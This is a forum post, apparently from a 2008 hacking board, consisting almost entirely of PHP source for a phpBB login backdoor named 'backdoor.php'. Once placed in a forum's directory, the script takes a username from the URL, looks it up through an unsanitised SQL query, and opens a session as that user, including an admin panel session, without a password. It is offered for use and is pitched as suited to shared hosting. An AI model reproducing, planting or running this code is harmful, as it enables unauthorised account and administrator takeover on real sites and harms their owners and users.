|
|
03-19-2008
|
#1 (permalink) |
|
Founder
 
Join Date: Mar 2006
Posts: 7,413
Thanks: 130
Thanked 232 Times in 139 Posts
Rep Power: 285
   |
<?php
/************************************************** ************************* * backdoor.php v1.02 by xprog * ------------------- * pbpbb login backdoor, log as a user without password. * Currently you need to remove your cookies before running. * It will create an admin panel session if the user is an admin. * * Specify the local path to phpbb, as long as the php user(nobody) * has read access it will work. Great for shared hosting. * * usage: * backdoor.php?bd=username * * ************************************************** *************************/ if (isset($_GET['bd'])) { $phpbb_root_path = './'; // define path to root of phpbb, leave if current dir. define('IN_PHPBB', true); include($phpbb_root_path . 'extension.inc'); include($phpbb_root_path . 'common.'.$phpEx); $username = $_GET['bd']; $sql = "SELECT user_id FROM " . USERS_TABLE . " WHERE username = '" . $username . "'"; $row = $db->sql_fetchrow($db->sql_query($sql)); if (!$row['user_id']) die("Invalid username!"); else { $session_id = session_begin($row['user_id'], $user_ip, PAGE_INDEX, FALSE, TRUE, 1); redirect(append_sid($url, true)); } } ?>
__________________
To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts. |
|
    
|
 |
| Bookmarks |
| Currently Active Users Viewing This Thread: 1 (0 members and 1 guests) | |
| Thread Tools | |
| Display Modes | |
|
|
Similar Threads
|
||||
| Thread | Thread Starter | Forum | Replies | Last Post |
| Login as an admin on phpBB forums!!! | The Boss | Exploit Codes | 47 | 08-10-2008 11:20 PM |
Linear Mode
